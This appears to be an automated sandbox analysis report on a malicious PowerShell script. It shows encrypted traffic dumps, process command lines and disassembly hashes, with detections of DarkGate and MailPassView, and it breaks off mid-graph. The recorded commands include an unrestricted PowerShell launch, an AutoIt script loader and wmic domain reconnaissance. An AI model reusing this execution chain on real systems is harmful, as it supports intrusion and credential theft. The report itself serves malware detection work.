                                    2024-05-27 16:28:59 UTC16384INData Raw: 0f da a4 5a 9b c9 65 73 36 af 3a 7d 7f 93 cd 94 67 73 1e 5e 3d 08 be 89 66 a5 b6 df 4a 3a 76 88 c6 88 6b 4d 6a ff f8 7a d4 7a 40 0b eb 76 b4 4e 58 48 5e ff a3 a6 55 79 6c da 69 ec fc 25 f2 bc 14 39 4e 9e 67 2d 8b 9a f8 83 05 e8 1f 90 95 34 bc c9 76 1c 4c 2c bc 88 2c da 43 8f ff 9c 5d a2 d9 a1 a9 3c 99 4b df b3 e0 dd 03 9b 1f cd 42 f2 17 44 4c 65 8a 8b a4 99 bb 0f a0 0a 7f c1 bb 98 ad 38 b1 80 dc d8 a1 69 b2 99 42 e9 15 95 7f 5e 92 d7 08 19 cb 71 c5 58 86 79 66 75 98 62 a3 9f e5 bb ac f2 10 b9 2c 45 2e 33 57 dd 65 33 0e a5 0b e0 25 cc f3 75 0c 8f 29 44 43 b7 09 01 71 92 b2 20 cd 8e a2 54 d4 13 01 9a bf b5 c2 b3 4b a9 eb 59 91 86 3e 42 eb f1 69 3a ac e6 40 78 29 40 50 cb 1c e2 1c 0e 1d 3e 7e f8 ab c3 2d 09 4d e2 f9 9e 73 4a 17 c4 4a 82 18 73 d3 ec 3d 5f 98
                                    Data Ascii: Zes6:}gs^=fJ:vkMjzz@vNXH^Uyli%9Ng-4vL,,C]<KBDLe8iB^qXyfub,E.3We3%u)DCq TKY>Bi:@x)@P>~-MsJJs=_
                                    2024-05-27 16:28:59 UTC16384INData Raw: 19 83 45 b3 cd ac 1a d3 2e d5 40 3c 28 02 2c d6 5d 1d 7e db 0c 39 af d3 19 e4 25 d4 a4 f1 26 c2 74 b5 29 7e e6 28 be fa 33 68 97 db 82 c2 a0 9a b8 79 39 a1 e7 a8 52 78 67 ae 33 bc 7a 8c 3f c7 50 39 63 b0 98 88 36 00 1b 8c 35 71 21 b4 cd 5b 33 44 09 cf 53 d7 51 5a e4 50 35 27 cd ad 98 b7 60 a9 62 6a 11 99 5f 20 b4 5e aa 38 c5 09 6b a0 f8 7a b4 ee b9 29 e6 5c 61 02 60 f5 26 ce 70 69 a2 05 32 56 af af 8f 4b 9c a7 d8 58 ed 5c 5a cd dc 91 16 75 98 53 ec 12 47 42 3c 8c 35 14 62 41 a1 9d 15 9d fc c3 73 d1 7e c5 9d d0 19 35 af 86 8d b9 2b 8e 92 07 3a 23 8b 2c 7c 08 31 6b 86 cc 53 0f 03 54 0f d6 47 90 43 2b 6f cb 12 ad 36 23 e4 61 56 2d 9b e2 01 31 d2 a8 2f 3d 8c 9d 8a f7 e1 55 27 8a 79 5c 86 da de b5 29 ae 3a b0 2e 6e 1e 35 e9 c5 bf 1d 70 1c 99 5d b9 b3 03 cd 69
                                    Data Ascii: E.@<(,]~9%&t)~(3hy9Rxg3z?P9c65q![3DSQZP5'`bj_ ^8kz)\a`&pi2VKX\ZuSGB<5bAs~5+:#,|1kSTGC+o6#aV-1/=U'y\):.n5p]i
                                    2024-05-27 16:28:59 UTC16384INData Raw: dd 12 da b2 12 7d 38 4d d7 9c ff f1 bd 5d bc 2e 26 0d d5 bb 91 d6 11 dc 05 7f e5 01 90 49 fc 2a 24 db 3b a3 0c b6 a0 6d 33 d1 53 19 5d 10 3c b9 a0 60 06 c4 f8 74 43 77 0c ae 84 82 b0 65 b4 b5 fc 85 36 ef 4a c1 a8 dd e2 db a0 66 e2 aa 6b 61 30 f1 fa 3c b7 c1 a8 8f 74 05 af 8b bf 5b 4e 72 be 76 10 66 5e 48 29 7e e0 ec 52 7f ca 95 ec b9 f2 f8 46 e7 29 2c 3a d0 cb 6d 99 0d 7e 44 5e c9 6b 51 eb 53 1a 60 5a 3f 65 69 c0 6a db 67 86 ab bd 06 5f 51 cc 6b b1 b4 a5 1f 58 7e 54 1d a0 e2 06 bd e7 ab ab eb bf 8a 0c 3e d4 98 dd 27 79 a4 b3 2b 79 f9 08 f0 a8 a3 d5 06 a0 a5 d0 1b 5d f5 9a a3 ee cb 28 35 ce 88 39 32 39 79 79 4c 53 ed d4 91 c9 10 69 4c c9 25 f9 1a e4 fa 89 bf 3a 72 a6 da ac 49 10 4b 95 0d b6 d2 40 6c a5 b2 bd de 24 95 87 46 b1 c1 5e be 35 d8 8b db 82 cc a5
                                    Data Ascii: }8M].&I*$;m3S]<`tCwe6Jfka0<t[Nrvf^H)~RF),:m~D^kQS`Z?eijg_QkX~T>'y+y](5929yyLSiL%:rIK@l$F^5
                                    2024-05-27 16:28:59 UTC16384INData Raw: 1b 78 2d b6 06 87 5a 51 31 7c 35 85 ab b7 3f 38 d0 ee 3a 69 41 91 af f6 e5 28 41 a8 ae 00 c4 83 14 21 47 53 ed 26 e4 51 93 6e 09 35 e9 9f f2 08 4d 04 b0 01 f3 c3 28 c7 a2 72 dd 13 0f 77 9f be 3f 86 ce d2 7e 40 d0 6d ac f6 3a 83 93 db 59 e5 75 86 78 b6 28 3c 6f fc f5 61 9a 37 1a 42 d2 e0 b3 0f 77 93 06 03 8f a2 70 26 7a 7d 38 5e 41 0c bc 8b 0b 70 8b 1f 46 be ff 14 08 e9 da 03 0f 07 c5 c0 ab 8d 82 46 07 c6 f1 58 2e 8a 95 bd 1e 66 3a e7 c3 41 d9 2f 3d 0c 1c f1 30 97 fd 40 96 7f 98 36 3b 46 8f 24 f9 6f 08 c7 b2 0f 0e e8 f1 1b a0 4a 56 d1 f7 f1 d2 ee 82 e0 d9 5b a0 7e 3f 2f c5 9c 32 53 2e a1 44 63 6b cc e0 d3 fe 3b 4b c3 75 7b 67 29 d5 ed 0c d6 0d ef da d1 75 d3 17 97 86 ea 87 40 90 6c 4a 8d 02 57 41 08 d0 88 0d a7 64 d1 bb 96 ee 81 d9 02 8f 41 cf da d4 68 c4
                                    Data Ascii: x-ZQ1|5?8:iA(A!GS&Qn5M(rw?~@m:Yux(<oa7Bwp&z}8^ApFFX.f:A/=0@6;F$oJV[~?/2S.Dck;Ku{g)u@lJWAdAh


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:12:28:55
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:12:28:55
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:12:28:56
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\ipconfig.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                    Imagebase:0x7ff615c30000
                                    File size:35'840 bytes
                                    MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:12:29:00
                                    Start date:27/05/2024
                                    Path:C:\downloads\Autoit3.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\downloads\Autoit3.exe" c:\\downloads\script.a3x
                                    Imagebase:0x800000
                                    File size:893'608 bytes
                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 3%, ReversingLabs
                                    • Detection: 4%, Virustotal, Browse
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:12:29:01
                                    Start date:27/05/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:12:29:01
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:12:29:01
                                    Start date:27/05/2024
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic ComputerSystem get domain
                                    Imagebase:0xac0000
                                    File size:427'008 bytes
                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Executed Functions

                                      Function 00007FFD9B894018 Relevance: 1.9, Strings: 1, Instructions: 611COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pR_L
                                      • API String ID: 0-1728760190
                                      • Opcode ID: b1c4a05e8a0510a3dca8b1698329638d066577ab1619917991a079d99417ee05
                                      • Instruction ID: b1dca7cad0a012569d2155ee3fceaf79ddb5e18c11d32124d182ceab9afd07bf
                                      • Opcode Fuzzy Hash: b1c4a05e8a0510a3dca8b1698329638d066577ab1619917991a079d99417ee05
                                      • Instruction Fuzzy Hash: 00222A34608A4D8FDF98EF5CC898AA977E1FF6C305B0501A9E85ED72A5DA35EC41CB40
                                      Function 00007FFD9B895110 Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: b40ce91b982627b6fc4c795b0c1c28768ceca3dc6e3b3fa85ff6f488a1844da2
                                      • Instruction ID: 91ebb19e2abf1b0b28cdc873e69e4db64a3ebdaa27f713b24e3e1ceaaae31b4c
                                      • Opcode Fuzzy Hash: b40ce91b982627b6fc4c795b0c1c28768ceca3dc6e3b3fa85ff6f488a1844da2
                                      • Instruction Fuzzy Hash: 1091683070DA4D0FDB64EBAC9865AB97BD1EF99310F1501BBF08DC32A2D918DD828381
                                      Function 00007FFD9B895BD3 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M_^
                                      • API String ID: 0-3807191693
                                      • Opcode ID: bed8285d66e414b5ac1518e0a270af127a2d029ec555f290c8020f5d303cd467
                                      • Instruction ID: 829d593a96e7ee05b6e21cfcb8758b491e074e073939ee54c584b5fb7acba12d
                                      • Opcode Fuzzy Hash: bed8285d66e414b5ac1518e0a270af127a2d029ec555f290c8020f5d303cd467
                                      • Instruction Fuzzy Hash: 0E51F622A0F7CE4EEB66A7A858791E53F90DF56224F0A01F7E498CB1F3ED0469064281
                                      Function 00007FFD9BB80712 Relevance: .4, Instructions: 355COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1822666511.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9bb80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ceae4241ca51ba537ae7c95e872b1ef544da532c0656bcb636e1487de43c0d9b
                                      • Instruction ID: f877c83e892903377b177c4b900c217151dcae1447eb6a62f3f2773467af7c44
                                      • Opcode Fuzzy Hash: ceae4241ca51ba537ae7c95e872b1ef544da532c0656bcb636e1487de43c0d9b
                                      • Instruction Fuzzy Hash: B8B12432B0EE494FE7A8DB6C94605A477E2FF98754F55017ED05DC72E2DA34A842CB40
                                      Function 00007FFD9B894488 Relevance: .3, Instructions: 304COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ffb9424777570dbdb8db6096246592aa05acb908c5845c084f46629a3b136d9
                                      • Instruction ID: 61c9a7fc7027eef9eaebb73c68860b8a8c0d2560c48927159a4a38956a0a9638
                                      • Opcode Fuzzy Hash: 9ffb9424777570dbdb8db6096246592aa05acb908c5845c084f46629a3b136d9
                                      • Instruction Fuzzy Hash: D681D620B0DA0E4FEFA8E76C94695B97BD1EF5C310B1505BAD05EC32E6DD29AD428341
                                      Function 00007FFD9B894E0D Relevance: .3, Instructions: 269COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: af0f42df471a88ace4c891a39986dedb34260310144511c87fc45c80a7c6505c
                                      • Instruction ID: 88eab62c7c05fa3efaf014c0c57615e8735909366fdf2d97d1d5a5dab454b593
                                      • Opcode Fuzzy Hash: af0f42df471a88ace4c891a39986dedb34260310144511c87fc45c80a7c6505c
                                      • Instruction Fuzzy Hash: 11718621F09D1E4FEFA5E76C88755BD63D2EF58310B5142B5D05EC32E6DE28AD428780
                                      Function 00007FFD9B893DE8 Relevance: .2, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37bce14abbbd2bcd0e32d20b9c56ad8c61ddddfecb7340bb808e86632ebe8c60
                                      • Instruction ID: c895c258e80340b5e70760ba926efb6911d9389d061e4f18229eb61aa90b3bf1
                                      • Opcode Fuzzy Hash: 37bce14abbbd2bcd0e32d20b9c56ad8c61ddddfecb7340bb808e86632ebe8c60
                                      • Instruction Fuzzy Hash: D7512731B0DA0C4FDF69EB68D865AF977E1EF89310F0501BAD44EC31A6DD24AD428781
                                      Function 00007FFD9B8953B5 Relevance: .2, Instructions: 197COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c61c1cf930b94168e10381a39257adc09d32666bb64752126d0f5fe4b2551baa
                                      • Instruction ID: 9cfbbad376259597eba508be4fbb4b6746ac91c0ef4e0240fbfaf105f944ef79
                                      • Opcode Fuzzy Hash: c61c1cf930b94168e10381a39257adc09d32666bb64752126d0f5fe4b2551baa
                                      • Instruction Fuzzy Hash: AA51B63070AA494FD7A4EF6CD865AA57BE1FF4931170600BAE489C72B6DA24ED81C781
                                      Function 00007FFD9B899EA0 Relevance: .2, Instructions: 175COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                      • Instruction ID: dac4114254ed7657f2303363bf19017805ef26e69b47fb8aa88595f9738b2a75
                                      • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                      • Instruction Fuzzy Hash: EC41E63131581C8FDAA4EB5CE898E6877E1FF6C31271605E6E44ACB275DA66DC81CB40
                                      Function 00007FFD9B898220 Relevance: .2, Instructions: 166COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16a50b7cdf966118e1cc24702f819169baef23e0c78406cf0d1178667704dd46
                                      • Instruction ID: fe50e13a8302ef773d30698c9d9a33ec264c18b13cce68c14203628cbaccae9d
                                      • Opcode Fuzzy Hash: 16a50b7cdf966118e1cc24702f819169baef23e0c78406cf0d1178667704dd46
                                      • Instruction Fuzzy Hash: 2341E721B0991E4FEBA9DB68D86A7F93BD1EF9C350F050579E41DC33D2DE2899428381
                                      Function 00007FFD9B8994E5 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9535a5420b5b9d69dea80f2b5f841d0b21e3c07fd85e015ab41e7670cf8a2cbd
                                      • Instruction ID: ef7a1a98dd34ad660052e085d5cbe7aa2e7f4a5c9d6a30bc2282d4cc345b1e0c
                                      • Opcode Fuzzy Hash: 9535a5420b5b9d69dea80f2b5f841d0b21e3c07fd85e015ab41e7670cf8a2cbd
                                      • Instruction Fuzzy Hash: 6741CC20A0E58E4FDF66DBA494793A93FE1EF4A310F0504BAE05DC32E6DE285945C381
                                      Function 00007FFD9B8943C8 Relevance: .1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf7fc123c0976f18bde44b5ce1c53856c2521f8e9b3899f468ac71067e1beda5
                                      • Instruction ID: 372a07e39912c3cbe8a9a01b999a03691b27527142cad485230076f4440f16e5
                                      • Opcode Fuzzy Hash: bf7fc123c0976f18bde44b5ce1c53856c2521f8e9b3899f468ac71067e1beda5
                                      • Instruction Fuzzy Hash: 8A31E620B0E94D9FEFA5DB6CC864B757BD1EF99310B1501B9D04EC72A2DE28AD82C740
                                      Function 00007FFD9B8967A1 Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7cf0f729ea11c5481b01fd0188c40042539ae5b0cfd07f609f0f64695bfa7f60
                                      • Instruction ID: b80031c97351e80ab4f98856ed074a420e02ff8a01a89a3185a8dcf24b86aa7e
                                      • Opcode Fuzzy Hash: 7cf0f729ea11c5481b01fd0188c40042539ae5b0cfd07f609f0f64695bfa7f60
                                      • Instruction Fuzzy Hash: C8218E71619E0C8FCBA8EB6CC49496577E1FF5C31534605ADD08AC7AA2DA25FC41C740
                                      Function 00007FFD9B899E81 Relevance: .1, Instructions: 73COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15c5aa6d91920a05e1b5cdfec8212bf190835890adad8218b80790a349281016
                                      • Instruction ID: db36e12d9f4e4bd4f5ce3edf045ebaa8e2d8b7ebee96e697fcaeb0b1d5ea452c
                                      • Opcode Fuzzy Hash: 15c5aa6d91920a05e1b5cdfec8212bf190835890adad8218b80790a349281016
                                      • Instruction Fuzzy Hash: E411423130D9884FDB95EB6CD8AC9647FE1EF5A31130605E7E089CB272D955DC81C740
                                      Function 00007FFD9B899FE2 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c340e1ad6e1369b9699e2cd7df6bce8bc1ca936eb58ff3f7222ea4422d743c3
                                      • Instruction ID: 9f1eb8f87e86f545e748f2c61fcea9b4df826f010deeecb1f37c9faecbd26fb6
                                      • Opcode Fuzzy Hash: 8c340e1ad6e1369b9699e2cd7df6bce8bc1ca936eb58ff3f7222ea4422d743c3
                                      • Instruction Fuzzy Hash: 4C211D30609A8D9FDB95DB68C464F617BE1EF6A304F0944EAD04DCB2A3CA25EC85CB50
                                      Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805325644.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                      Non-executed Functions

                                      Function 00007FFD9B95337D Relevance: .5, Instructions: 460COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1805993600.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335f83422618725c1ac324f6ef8a766448ba3e40654ec7cd764480699b4addfa
                                      • Instruction ID: de1ed46801114b06e20833c7d5d2e1c0e66bbf58bbedf8a4c6d2ee42e1bf7dfc
                                      • Opcode Fuzzy Hash: 335f83422618725c1ac324f6ef8a766448ba3e40654ec7cd764480699b4addfa
                                      • Instruction Fuzzy Hash: 80D14731A5F7CD2FD76697A898645A57FE0EF47220B0A01FFD48DC70A3DA18A906C352

                                      Execution Graph

                                      Execution Coverage:3.3%
                                      Dynamic/Decrypted Code Coverage:36.9%
                                      Signature Coverage:4.1%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:129
                                      execution_graph 140695 3cc4bac 140696 3cc4ab8 140695->140696 140697 3cc4bb4 140695->140697 140698 3cc4acc 140696->140698 140699 3cc4abe SysFreeString 140696->140699 140700 3cc4a88 140697->140700 140701 3cc4bc4 SysFreeString 140697->140701 140699->140698 140807 827e83 140808 827e8f __ioinit 140807->140808 140844 82a038 GetStartupInfoW 140808->140844 140810 827e94 140846 828dac GetProcessHeap 140810->140846 140812 827eec 140813 827ef7 140812->140813 140929 827fd3 58 API calls 3 library calls 140812->140929 140847 829d16 140813->140847 140816 827efd 140818 827f08 __RTC_Initialize 140816->140818 140930 827fd3 58 API calls 3 library calls 140816->140930 140868 82d802 140818->140868 140820 827f17 140821 827f23 GetCommandLineW 140820->140821 140931 827fd3 58 API calls 3 library calls 140820->140931 140887 835153 GetEnvironmentStringsW 140821->140887 140824 827f22 140824->140821 140827 827f3d 140830 827f48 140827->140830 140932 8232e5 58 API calls 3 library calls 140827->140932 140897 834f88 140830->140897 140831 827f4e 140832 827f59 140831->140832 140933 8232e5 58 API calls 3 library calls 140831->140933 140911 82331f 140832->140911 140835 827f61 140837 827f6c __wwincmdln 140835->140837 140934 8232e5 58 API calls 3 library calls 140835->140934 140917 815f8b 140837->140917 140839 827f80 140840 827f8f 140839->140840 140935 823588 58 API calls _doexit 140839->140935 140936 823310 58 API calls _doexit 140840->140936 140843 827f94 __ioinit 140845 82a04e 140844->140845 140845->140810 140846->140812 140937 8233b7 36 API calls 2 library calls 140847->140937 140849 829d1b 140938 829f6c InitializeCriticalSectionAndSpinCount __ioinit 140849->140938 140851 829d20 140852 829d24 140851->140852 140940 829fba TlsAlloc 140851->140940 140939 829d8c 61 API calls 2 library calls 140852->140939 140855 829d29 140855->140816 140856 829d36 140856->140852 140857 829d41 140856->140857 140941 828a05 140857->140941 140860 829d83 140949 829d8c 61 API calls 2 library calls 140860->140949 140863 829d62 140863->140860 140865 829d68 140863->140865 140864 829d88 140864->140816 140948 829c63 58 API calls 4 library calls 140865->140948 140867 829d70 GetCurrentThreadId 140867->140816 140869 82d80e __ioinit 140868->140869 140961 829e3b 140869->140961 140871 82d815 140872 828a05 __calloc_crt 58 API calls 140871->140872 140873 82d826 140872->140873 140874 82d891 GetStartupInfoW 140873->140874 140875 82d831 __ioinit @_EH4_CallFilterFunc@8 140873->140875 140876 82d8a6 140874->140876 140880 